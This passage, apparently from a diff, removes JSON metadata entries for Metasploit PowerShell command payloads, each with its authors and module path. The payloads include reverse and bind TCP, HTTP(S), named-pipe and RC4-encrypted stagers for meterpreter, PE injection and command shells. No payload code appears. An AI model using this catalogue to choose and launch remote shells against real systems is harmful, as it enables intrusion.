x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttp": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/meterpreter/reverse_winhttps": { - "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp": { - "name": "Powershell Exec, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a 
connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp_rc4": { - "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", 
- "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/peinject/bind_tcp_uuid": { - "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_named_pipe": { - "name": "Powershell Exec, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - 
"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - 
"payload_cmd/windows/powershell/x64/peinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/peinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - 
"autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/pingback_reverse_tcp": { - "name": "Powershell Exec, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/powershell/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_bind_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - 
"type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_reverse_tcp": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": 
"windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/powershell/x64/powershell_reverse_tcp_ssl": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": 
"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell/bind_named_pipe": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows 
x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "UserExistsError" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/powershell/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp_rc4": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/shell/bind_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/shell/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer 
